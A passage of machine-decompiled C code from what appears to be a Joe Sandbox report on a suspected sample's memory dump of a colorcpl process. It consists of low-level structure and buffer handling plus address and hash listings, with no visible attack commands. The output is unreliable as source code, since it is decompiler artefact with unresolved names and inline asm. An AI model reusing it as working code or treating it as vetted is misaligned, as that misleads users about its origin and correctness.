                                                                                                								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                                                								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                                                								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                                                									goto L92;
                                                                                                								}
                                                                                                								__eflags = _t442 -  *(_t474 - 0x11);
                                                                                                								if(_t442 !=  *(_t474 - 0x11)) {
                                                                                                									goto L92;
                                                                                                								}
                                                                                                								L15:
                                                                                                								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                                                								 *(_t528 - 0xc0) = _t306;
                                                                                                								 *(_t528 - 0xa4) = _t306;
                                                                                                								__eflags =  *0x6f060e8;
                                                                                                								if( *0x6f060e8 != 0) {
                                                                                                									__eflags = _t306 - 0x40;
                                                                                                									if(_t306 < 0x40) {
                                                                                                										L20:
                                                                                                										asm("lock inc dword [eax]");
                                                                                                										_t310 =  *0x6f060e8; // 0x0
                                                                                                										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                                                										__eflags = _t311 & 0x00000001;
                                                                                                										if((_t311 & 0x00000001) == 0) {
                                                                                                											 *(_t528 - 0xa0) = _t311;
                                                                                                											_t475 = _t427;
                                                                                                											 *(_t528 - 0x74) = _t427;
                                                                                                											__eflags = _t475;
                                                                                                											if(_t475 != 0) {
                                                                                                												L91:
                                                                                                												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                												goto L92;
                                                                                                											}
                                                                                                											asm("sbb edi, edi");
                                                                                                											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                                                											_t511 = _t498;
                                                                                                											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                											__eflags =  *(_t312 - 5) & 1;
                                                                                                											if(( *(_t312 - 5) & 1) != 0) {
                                                                                                												_push(_t528 - 0x98);
                                                                                                												_push(0x4c);
                                                                                                												_push(_t528 - 0x70);
                                                                                                												_push(1);
                                                                                                												_push(0xfffffffa);
                                                                                                												_t412 = E06E59710();
                                                                                                												_t475 = _t427;
                                                                                                												__eflags = _t412;
                                                                                                												if(_t412 >= 0) {
                                                                                                													_t414 =  *(_t528 - 0x98) - 8;
                                                                                                													 *(_t528 - 0x98) = _t414;
                                                                                                													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                                                													 *(_t528 - 0x8c) = _t416;
                                                                                                													 *(_t528 - 0x79) = 1;
                                                                                                													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                                                													__eflags = _t511;
                                                                                                												}
                                                                                                											}
                                                                                                											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                                                											__eflags = _t446 & 0x00000004;
                                                                                                											if((_t446 & 0x00000004) != 0) {
                                                                                                												__eflags =  *(_t528 - 0x9c);
                                                                                                												if( *(_t528 - 0x9c) != 0) {
                                                                                                													 *(_t528 - 0x7a) = 1;
                                                                                                													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                                                                													__eflags = _t511;
                                                                                                												}
                                                                                                											}
                                                                                                											_t313 = 2;
                                                                                                											_t447 = _t446 & _t313;
                                                                                                											__eflags = _t447;
                                                                                                											 *(_t528 - 0xd4) = _t447;
                                                                                                											if(_t447 != 0) {
                                                                                                												_t406 = 0x10;
                                                                                                												_t511 = _t511 + _t406;
                                                                                                												__eflags = _t511;
                                                                                                											}
                                                                                                											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                                                                											 *(_t528 - 0x88) = _t427;
                                                                                                											__eflags =  *(_t528 + 0x1c);
                                                                                                											if( *(_t528 + 0x1c) <= 0) {
                                                                                                												L45:
                                                                                                												__eflags =  *(_t528 - 0xb0);
                                                                                                												if( *(_t528 - 0xb0) != 0) {
                                                                                                													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                                													__eflags = _t511;
                                                                                                												}
                                                                                                												__eflags = _t475;
                                                                                                												if(_t475 != 0) {
                                                                                                													asm("lock dec dword [ecx+edx*8+0x4]");
                                                                                                													goto L100;
                                                                                                												} else {
                                                                                                													_t494[3] = _t511;
                                                                                                													_t451 =  *(_t528 - 0xa0);
                                                                                                													_t427 = E06E56DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                                                                													 *(_t528 - 0x88) = _t427;
                                                                                                													__eflags = _t427;
                                                                                                													if(_t427 == 0) {
                                                                                                														__eflags = _t511 - 0xfff8;
                                                                                                														if(_t511 <= 0xfff8) {
                                                                                                															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                                                                															asm("sbb ecx, ecx");
                                                                                                															__eflags = (_t451 & 0x000000e2) + 8;
                                                                                                														}
                                                                                                														asm("lock dec dword [eax+edx*8+0x4]");
                                                                                                														L100:
                                                                                                														goto L101;
                                                                                                													}
                                                                                                													_t453 =  *(_t528 - 0xa0);
                                                                                                													 *_t494 = _t453;
                                                                                                													_t494[1] = _t427;
                                                                                                													_t494[2] =  *(_t528 - 0xbc);
                                                                                                													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                                                                													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                                                                													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                                                                													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                                                                													asm("movsd");
                                                                                                													asm("movsd");
                                                                                                													asm("movsd");
                                                                                                													asm("movsd");
                                                                                                													asm("movsd");
                                                                                                													asm("movsd");
                                                                                                													asm("movsd");
                                                                                                													asm("movsd");
                                                                                                													__eflags =  *(_t528 + 0x14);
                                                                                                													if( *(_t528 + 0x14) == 0) {
                                                                                                														__eflags =  *[fs:0x18] + 0xf50;
                                                                                                													}
                                                                                                													asm("movsd");
                                                                                                													asm("movsd");
                                                                                                													asm("movsd");
                                                                                                													asm("movsd");
                                                                                                													__eflags =  *(_t528 + 0x18);
                                                                                                													if( *(_t528 + 0x18) == 0) {
                                                                                                														_t454 =  *(_t528 - 0x80);
                                                                                                														_t479 =  *(_t528 - 0x78);
                                                                                                														_t327 = 1;
                                                                                                														__eflags = 1;
                                                                                                													} else {
                                                                                                														_t146 = _t427 + 0x50; // 0x50
                                                                                                														_t454 = _t146;
                                                                                                														 *(_t528 - 0x80) = _t454;
                                                                                                														_t382 = 0x18;
                                                                                                														 *_t454 = _t382;
                                                                                                														 *((short*)(_t454 + 2)) = 1;
                                                                                                														_t385 = 0x10;
                                                                                                														 *((short*)(_t454 + 6)) = _t385;
                                                                                                														 *(_t454 + 4) = 0;
                                                                                                														asm("movsd");
                                                                                                														asm("movsd");
                                                                                                														asm("movsd");
                                                                                                														asm("movsd");
                                                                                                														_t327 = 1;
                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                														_t479 = 0x68;
                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                													}
                                                                                                													__eflags =  *(_t528 - 0x79) - _t327;
                                                                                                													if( *(_t528 - 0x79) == _t327) {
                                                                                                														_t524 = _t479 + _t427;
                                                                                                														_t508 =  *(_t528 - 0x8c);
                                                                                                														 *_t524 = _t508;
                                                                                                														_t373 = 2;
                                                                                                														 *((short*)(_t524 + 2)) = _t373;
                                                                                                														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                                                                														 *((short*)(_t524 + 4)) = 0;
                                                                                                														_t167 = _t524 + 8; // 0x8
                                                                                                														E06E5F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                                                														_t529 = _t529 + 0xc;
                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                														_t380 =  *(_t528 - 0x80);
                                                                                                														__eflags = _t380;
                                                                                                														if(_t380 != 0) {
                                                                                                															_t173 = _t380 + 4;
                                                                                                															 *_t173 =  *(_t380 + 4) | 1;
                                                                                                															__eflags =  *_t173;
                                                                                                														}
                                                                                                														_t454 = _t524;
                                                                                                														 *(_t528 - 0x80) = _t454;
                                                                                                														_t327 = 1;
                                                                                                														__eflags = 1;
                                                                                                													}
                                                                                                													__eflags =  *(_t528 - 0xd4);
                                                                                                													if( *(_t528 - 0xd4) == 0) {
                                                                                                														_t505 =  *(_t528 - 0x80);
                                                                                                													} else {
                                                                                                														_t505 = _t479 + _t427;
                                                                                                														_t523 = 0x10;
                                                                                                														 *_t505 = _t523;
                                                                                                														_t367 = 3;
                                                                                                														 *((short*)(_t505 + 2)) = _t367;
                                                                                                														_t368 = 4;
                                                                                                														 *((short*)(_t505 + 6)) = _t368;
                                                                                                														 *(_t505 + 4) = 0;
                                                                                                														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                                                														_t327 = 1;
                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                														_t479 = _t479 + _t523;
                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                														__eflags = _t454;
                                                                                                														if(_t454 != 0) {
                                                                                                															_t186 = _t454 + 4;
                                                                                                															 *_t186 =  *(_t454 + 4) | 1;
                                                                                                															__eflags =  *_t186;
                                                                                                														}
                                                                                                														 *(_t528 - 0x80) = _t505;
                                                                                                													}
                                                                                                													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                                                													if( *(_t528 - 0x7a) == _t327) {
                                                                                                														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                                                														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                                                														E06E5F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                                                														_t529 = _t529 + 0xc;
                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                														_t479 =  *(_t528 - 0x78) + _t522;
                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                														__eflags = _t505;
                                                                                                														if(_t505 != 0) {
                                                                                                															_t199 = _t505 + 4;
                                                                                                															 *_t199 =  *(_t505 + 4) | 1;
                                                                                                															__eflags =  *_t199;
                                                                                                														}
                                                                                                														_t505 =  *(_t528 - 0xd4);
                                                                                                														 *(_t528 - 0x80) = _t505;
                                                                                                													}
                                                                                                													__eflags =  *(_t528 - 0xa8);
                                                                                                													if( *(_t528 - 0xa8) != 0) {
                                                                                                														_t356 = _t479 + _t427;
                                                                                                														 *(_t528 - 0xd4) = _t356;
                                                                                                														_t462 =  *(_t528 - 0xac);
                                                                                                														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                                                														_t485 = 0xc;
                                                                                                														 *((short*)(_t356 + 2)) = _t485;
                                                                                                														 *(_t356 + 6) = _t462;
                                                                                                														 *((short*)(_t356 + 4)) = 0;
                                                                                                														_t211 = _t356 + 8; // 0x9
                                                                                                														E06E5F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                                                														E06E5FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                                                														_t529 = _t529 + 0x18;
                                                                                                														_t427 =  *(_t528 - 0x88);
                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                														_t505 =  *(_t528 - 0xd4);
                                                                                                														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                														_t362 =  *(_t528 - 0x80);
                                                                                                														__eflags = _t362;
                                                                                                														if(_t362 != 0) {
                                                                                                															_t222 = _t362 + 4;
                                                                                                															 *_t222 =  *(_t362 + 4) | 1;
                                                                                                															__eflags =  *_t222;
                                                                                                														}
                                                                                                													}
                                                                                                													__eflags =  *(_t528 - 0xb0);
                                                                                                													if( *(_t528 - 0xb0) != 0) {
                                                                                                														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                                                														_t458 = 0xb;
                                                                                                														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                                                														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                                                														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                                                														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                                                                														E06E5FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                                                														_t529 = _t529 + 0xc;
                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                														__eflags = _t505;
                                                                                                														if(_t505 != 0) {
                                                                                                															_t241 = _t505 + 4;
                                                                                                															 *_t241 =  *(_t505 + 4) | 1;
                                                                                                															__eflags =  *_t241;
                                                                                                														}
                                                                                                													}
                                                                                                													_t328 =  *(_t528 + 0x1c);
                                                                                                													__eflags = _t328;
                                                                                                													if(_t328 == 0) {
                                                                                                														L87:
                                                                                                														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                                                														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                                                														_t455 =  *(_t528 - 0xdc);
                                                                                                														 *(_t427 + 0x14) = _t455;
                                                                                                														_t480 =  *(_t528 - 0xa0);
                                                                                                														_t517 = 3;
                                                                                                														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                                                														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                                                															asm("rdtsc");
                                                                                                															 *(_t427 + 0x3c) = _t480;
                                                                                                														} else {
                                                                                                															 *(_t427 + 0x3c) = _t455;
                                                                                                														}
                                                                                                														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                                                														_t456 =  *[fs:0x18];
                                                                                                														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                                                														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                                                														_t427 = 0;
                                                                                                														__eflags = 0;
                                                                                                														_t511 = 0x18;
                                                                                                														goto L91;
                                                                                                													} else {
                                                                                                														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                                                														__eflags = _t519;
                                                                                                														 *(_t528 - 0x8c) = _t328;
                                                                                                														do {
                                                                                                															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                                                															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                                                															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                                                															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                                                															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                                                															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                                                																_t334 =  *_t519;
                                                                                                															} else {
                                                                                                																_t334 = 0;
                                                                                                															}
                                                                                                															_t336 = _t334 & 0x000000ff;
                                                                                                															__eflags = _t336;
                                                                                                															_t427 =  *(_t528 - 0x88);
                                                                                                															if(_t336 == 0) {
                                                                                                																_t481 = _t479 + _t506;
                                                                                                																__eflags = _t481;
                                                                                                																 *(_t528 - 0x78) = _t481;
                                                                                                																E06E5F3E0(_t479 + _t427, _t457, _t506);
                                                                                                																_t529 = _t529 + 0xc;
                                                                                                															} else {
                                                                                                																_t340 = _t336 - 1;
                                                                                                																__eflags = _t340;
                                                                                                																if(_t340 == 0) {
                                                                                                																	E06E5F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                                                																	_t529 = _t529 + 0xc;
                                                                                                																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                                                																} else {
                                                                                                																	__eflags = _t340 == 0;
                                                                                                																	if(_t340 == 0) {
                                                                                                																		__eflags = _t506 - 8;
                                                                                                																		if(_t506 == 8) {
                                                                                                																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                                                																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                                                																		}
                                                                                                																	}
                                                                                                																}
                                                                                                															}
                                                                                                															_t339 = 0x10;
                                                                                                															_t519 = _t519 + _t339;
                                                                                                															_t263 = _t528 - 0x8c;
                                                                                                															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                                                															__eflags =  *_t263;
                                                                                                															_t479 =  *(_t528 - 0x78);
                                                                                                														} while ( *_t263 != 0);
                                                                                                														goto L87;
                                                                                                													}
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                                                                												 *(_t528 - 0xa2) = _t392;
                                                                                                												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                                                												__eflags = _t469;
                                                                                                												while(1) {
                                                                                                													 *(_t528 - 0xe4) = _t511;
                                                                                                													__eflags = _t392;
                                                                                                													_t393 = _t427;
                                                                                                													if(_t392 != 0) {
                                                                                                														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                                                													}
                                                                                                													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                                                													__eflags = _t395;
                                                                                                													if(_t395 == 0) {
                                                                                                														_t511 = _t511 +  *_t469;
                                                                                                														__eflags = _t511;
                                                                                                													} else {
                                                                                                														_t398 = _t395 - 1;
                                                                                                														__eflags = _t398;
                                                                                                														if(_t398 == 0) {
                                                                                                															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                                                															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                                                														} else {
                                                                                                															__eflags = _t398 == 1;
                                                                                                															if(_t398 == 1) {
                                                                                                																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                                                																_t402 =  *_t469 & 0x0000ffff;
                                                                                                																 *(_t528 - 0xac) = _t402;
                                                                                                																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                                                													if(_t511 <  *(_t528 - 0xe4)) {
                                                                                                														break;
                                                                                                													}
                                                                                                													_t397 =  *(_t528 - 0x88) + 1;
                                                                                                													 *(_t528 - 0x88) = _t397;
                                                                                                													_t469 = _t469 + 0x10;
                                                                                                													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                                                													_t392 =  *(_t528 - 0xa2);
                                                                                                													if(_t397 <  *(_t528 + 0x1c)) {
                                                                                                														continue;
                                                                                                													}
                                                                                                													goto L45;
                                                                                                												}
                                                                                                												_t475 = 0x216;
                                                                                                												 *(_t528 - 0x74) = 0x216;
                                                                                                												goto L45;
                                                                                                											}
                                                                                                										} else {
                                                                                                											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                                                											goto L16;
                                                                                                										}
                                                                                                									}
                                                                                                									_t491 = E06EE4CAB(_t306, _t528 - 0xa4);
                                                                                                									 *(_t528 - 0x74) = _t491;
                                                                                                									__eflags = _t491;
                                                                                                									if(_t491 != 0) {
                                                                                                										goto L91;
                                                                                                									} else {
                                                                                                										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                										goto L20;
                                                                                                									}
                                                                                                								}
                                                                                                								L16:
                                                                                                								 *(_t528 - 0x74) = 0x1069;
                                                                                                								L93:
                                                                                                								_t298 =  *(_t528 - 0xd0) + 1;
                                                                                                								 *(_t528 - 0xd0) = _t298;
                                                                                                								_t474 = _t474 + _t511;
                                                                                                								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                                								_t494 = 4;
                                                                                                								__eflags = _t298 - _t494;
                                                                                                								if(_t298 >= _t494) {
                                                                                                									goto L100;
                                                                                                								}
                                                                                                								_t494 =  *(_t528 - 0xcc);
                                                                                                								_t435 = _t298;
                                                                                                								continue;
                                                                                                							}
                                                                                                							__eflags = _t494[2] | _t494[3];
                                                                                                							if((_t494[2] | _t494[3]) == 0) {
                                                                                                								goto L15;
                                                                                                							}
                                                                                                							goto L12;
                                                                                                						}
                                                                                                						__eflags = _t301;
                                                                                                						if(_t301 != 0) {
                                                                                                							goto L92;
                                                                                                						}
                                                                                                						goto L10;
                                                                                                						L92:
                                                                                                						goto L93;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_push(0x57);
                                                                                                					L101:
                                                                                                					return E06E6D130(_t427, _t494, _t511);
                                                                                                				}
                                                                                                			}
                                                                                                0x06ee60d4
                                                                                                0x06ee60d5
                                                                                                0x06ee60da
                                                                                                0x06ee60db
                                                                                                0x06ee60e1
                                                                                                0x06ee60e2
                                                                                                0x06ee60e8
                                                                                                0x06ee60f8
                                                                                                0x06ee60fd
                                                                                                0x06ee60fe
                                                                                                0x06ee6102
                                                                                                0x06ee6104
                                                                                                0x06ee6107
                                                                                                0x06ee6109
                                                                                                0x06ee610b
                                                                                                0x06ee610b
                                                                                                0x06ee610b
                                                                                                0x06ee610b
                                                                                                0x06ee610f
                                                                                                0x06ee610f
                                                                                                0x06ee6117
                                                                                                0x06ee611a
                                                                                                0x06ee611f
                                                                                                0x06ee6125
                                                                                                0x06ee6134
                                                                                                0x06ee6139
                                                                                                0x06ee613f
                                                                                                0x06ee6146
                                                                                                0x06ee6148
                                                                                                0x06ee614b
                                                                                                0x06ee614d
                                                                                                0x06ee614f
                                                                                                0x06ee614f
                                                                                                0x06ee614f
                                                                                                0x06ee614f
                                                                                                0x06ee6153
                                                                                                0x06ee6159
                                                                                                0x06ee6159
                                                                                                0x06ee615c
                                                                                                0x06ee6163
                                                                                                0x06ee6169
                                                                                                0x06ee616c
                                                                                                0x06ee6172
                                                                                                0x06ee6181
                                                                                                0x06ee6186
                                                                                                0x06ee6187
                                                                                                0x06ee618b
                                                                                                0x06ee6191
                                                                                                0x06ee6195
                                                                                                0x06ee61a3
                                                                                                0x06ee61bb
                                                                                                0x06ee61c0
                                                                                                0x06ee61c3
                                                                                                0x06ee61cc
                                                                                                0x06ee61d0
                                                                                                0x06ee61dc
                                                                                                0x06ee61de
                                                                                                0x06ee61e1
                                                                                                0x06ee61e4
                                                                                                0x06ee61e6
                                                                                                0x06ee61e8
                                                                                                0x06ee61e8
                                                                                                0x06ee61e8
                                                                                                0x06ee61e8
                                                                                                0x06ee61e6
                                                                                                0x06ee61ec
                                                                                                0x06ee61f3
                                                                                                0x06ee6203
                                                                                                0x06ee6209
                                                                                                0x06ee620a
                                                                                                0x06ee6216
                                                                                                0x06ee621d
                                                                                                0x06ee6227
                                                                                                0x06ee6241
                                                                                                0x06ee6246
                                                                                                0x06ee624c
                                                                                                0x06ee6257
                                                                                                0x06ee6259
                                                                                                0x06ee625c
                                                                                                0x06ee625e
                                                                                                0x06ee6260
                                                                                                0x06ee6260
                                                                                                0x06ee6260
                                                                                                0x06ee6260
                                                                                                0x06ee625e
                                                                                                0x06ee6264
                                                                                                0x06ee6267
                                                                                                0x06ee6269
                                                                                                0x06ee6315
                                                                                                0x06ee6315
                                                                                                0x06ee631b
                                                                                                0x06ee631e
                                                                                                0x06ee6324
                                                                                                0x06ee6327
                                                                                                0x06ee632f
                                                                                                0x06ee6330
                                                                                                0x06ee6333
                                                                                                0x06ee633a
                                                                                                0x06ee633c
                                                                                                0x06ee6335
                                                                                                0x06ee6335
                                                                                                0x06ee6335
                                                                                                0x06ee633f
                                                                                                0x06ee6342
                                                                                                0x06ee634c
                                                                                                0x06ee6352
                                                                                                0x06ee6355
                                                                                                0x06ee6355
                                                                                                0x06ee6359
                                                                                                0x00000000
                                                                                                0x06ee626f
                                                                                                0x06ee6275
                                                                                                0x06ee6275
                                                                                                0x06ee6278
                                                                                                0x06ee627e
                                                                                                0x06ee627e
                                                                                                0x06ee6281
                                                                                                0x06ee6287
                                                                                                0x06ee628d
                                                                                                0x06ee6298
                                                                                                0x06ee629c
                                                                                                0x06ee62a2
                                                                                                0x06ee629e
                                                                                                0x06ee629e
                                                                                                0x06ee629e
                                                                                                0x06ee62a7
                                                                                                0x06ee62a7
                                                                                                0x06ee62aa
                                                                                                0x06ee62b0
                                                                                                0x06ee62f0
                                                                                                0x06ee62f0
                                                                                                0x06ee62f2
                                                                                                0x06ee62f8
                                                                                                0x06ee62fd
                                                                                                0x06ee62b2
                                                                                                0x06ee62b2
                                                                                                0x06ee62b2
                                                                                                0x06ee62b5
                                                                                                0x06ee62dd
                                                                                                0x06ee62e2
                                                                                                0x06ee62e5
                                                                                                0x06ee62b7
                                                                                                0x06ee62b8
                                                                                                0x06ee62bb
                                                                                                0x06ee62bd
                                                                                                0x06ee62c0
                                                                                                0x06ee62c4
                                                                                                0x06ee62cd
                                                                                                0x06ee62cd
                                                                                                0x06ee62c0
                                                                                                0x06ee62bb
                                                                                                0x06ee62b5
                                                                                                0x06ee6302
                                                                                                0x06ee6303
                                                                                                0x06ee6305
                                                                                                0x06ee6305
                                                                                                0x06ee6305
                                                                                                0x06ee630c
                                                                                                0x06ee630c
                                                                                                0x00000000
                                                                                                0x06ee627e
                                                                                                0x06ee6269
                                                                                                0x06ee5eac
                                                                                                0x06ee5ebb
                                                                                                0x06ee5ebe
                                                                                                0x06ee5ecb
                                                                                                0x06ee5ecb
                                                                                                0x06ee5ece
                                                                                                0x06ee5ece
                                                                                                0x06ee5ed4
                                                                                                0x06ee5ed7
                                                                                                0x06ee5ed9
                                                                                                0x06ee5edb
                                                                                                0x06ee5edb
                                                                                                0x06ee5ee1
                                                                                                0x06ee5ee1
                                                                                                0x06ee5ee3
                                                                                                0x06ee5f20
                                                                                                0x06ee5f20
                                                                                                0x06ee5ee5
                                                                                                0x06ee5ee5
                                                                                                0x06ee5ee5
                                                                                                0x06ee5ee8
                                                                                                0x06ee5f11
                                                                                                0x06ee5f18
                                                                                                0x06ee5eea
                                                                                                0x06ee5eea
                                                                                                0x06ee5eed
                                                                                                0x06ee5ef2
                                                                                                0x06ee5ef8
                                                                                                0x06ee5efb
                                                                                                0x06ee5f0a
                                                                                                0x06ee5f0a
                                                                                                0x06ee5eed
                                                                                                0x06ee5ee8
                                                                                                0x06ee5f22
                                                                                                0x06ee5f28
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee5f30
                                                                                                0x06ee5f31
                                                                                                0x06ee5f37
                                                                                                0x06ee5f3a
                                                                                                0x06ee5f3d
                                                                                                0x06ee5f44
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee5f46
                                                                                                0x06ee5f48
                                                                                                0x06ee5f4d
                                                                                                0x00000000
                                                                                                0x06ee5f4d
                                                                                                0x06ee5dda
                                                                                                0x06ee5ddf
                                                                                                0x00000000
                                                                                                0x06ee5ddf
                                                                                                0x06ee5dd8
                                                                                                0x06ee5da7
                                                                                                0x06ee5da9
                                                                                                0x06ee5dac
                                                                                                0x06ee5dae
                                                                                                0x00000000
                                                                                                0x06ee5db4
                                                                                                0x06ee5db4
                                                                                                0x00000000
                                                                                                0x06ee5db4
                                                                                                0x06ee5dae
                                                                                                0x06ee5d88
                                                                                                0x06ee5d8d
                                                                                                0x06ee6363
                                                                                                0x06ee6369
                                                                                                0x06ee636a
                                                                                                0x06ee6370
                                                                                                0x06ee6372
                                                                                                0x06ee637a
                                                                                                0x06ee637b
                                                                                                0x06ee637d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee637f
                                                                                                0x06ee6385
                                                                                                0x00000000
                                                                                                0x06ee6385
                                                                                                0x06ee5d38
                                                                                                0x06ee5d3b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee5d3b
                                                                                                0x06ee5d27
                                                                                                0x06ee5d29
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee6360
                                                                                                0x00000000
                                                                                                0x06ee6360
                                                                                                0x06ee5c10
                                                                                                0x06ee5c10
                                                                                                0x06ee63da
                                                                                                0x06ee63e5
                                                                                                0x06ee63e5

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7aee96b153b1524b66d13a23880a870669a96847305323da193a8c0faaa3620b
                                                                                                • Instruction ID: a1ac8c3a027e070a7ae34fe63a2923666bb79b6d4698a3a202368fa0604ff9ad
                                                                                                • Opcode Fuzzy Hash: 7aee96b153b1524b66d13a23880a870669a96847305323da193a8c0faaa3620b
                                                                                                • Instruction Fuzzy Hash: 40426A75D00329CFDBA0CF68C880BA9B7B1FF59308F1491AAD95DAB242E7359985CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E06E34120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                                                				signed int _v8;
                                                                                                				void* _v20;
